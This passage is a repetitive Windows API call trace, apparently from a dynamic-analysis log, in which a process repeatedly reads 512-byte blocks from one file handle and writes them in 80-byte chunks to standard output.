1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, 
lpOverlapped=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.984] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.984] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] GetFileType (hFile=0x50) returned 0x1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] WriteFile (in: hFile=0x50, 
lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] GetFileType (hFile=0x50) returned 0x1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] GetFileType (hFile=0x50) returned 0x1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] GetFileType (hFile=0x50) returned 0x1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.985] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.985] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 
[0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.986] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.987] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, 
lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: 
lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.987] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.988] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.989] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.989] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] 
GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 
[0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.990] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.990] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.990] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.990] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] GetFileType (hFile=0x50) returned 0x1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] GetFileType (hFile=0x50) returned 0x1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] GetFileType (hFile=0x50) returned 0x1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] GetFileType (hFile=0x50) returned 0x1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] GetFileType (hFile=0x50) returned 0x1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] GetFileType (hFile=0x50) returned 0x1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] GetFileType (hFile=0x50) returned 0x1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] GetFileType (hFile=0x50) returned 0x1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.991] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.991] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] GetFileType (hFile=0x50) returned 0x1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] GetFileType (hFile=0x50) returned 0x1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] GetFileType (hFile=0x50) returned 0x1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] GetFileType (hFile=0x50) returned 0x1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] GetFileType 
(hFile=0x50) returned 0x1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] GetFileType (hFile=0x50) returned 0x1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] GetFileType (hFile=0x50) returned 0x1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] GetFileType (hFile=0x50) returned 0x1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.993] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.993] _get_osfhandle 